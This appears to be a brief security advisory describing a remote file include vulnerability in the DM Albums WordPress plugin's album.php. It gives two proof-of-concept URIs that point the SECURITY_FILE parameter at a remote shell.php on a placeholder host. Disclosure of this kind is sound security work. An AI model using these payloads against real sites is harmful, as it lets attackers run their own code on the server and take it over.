DM Albums 'album.php' Remote File Include Vulnerability

DM Albums 'album.php' Remote File Include Vulnerability

An attacker can exploit this issue via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/[path]/template/album.php?SECURITY_FILE=http://example.net/shell.php
http://www.example.com/[path]/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://example.net/shell.php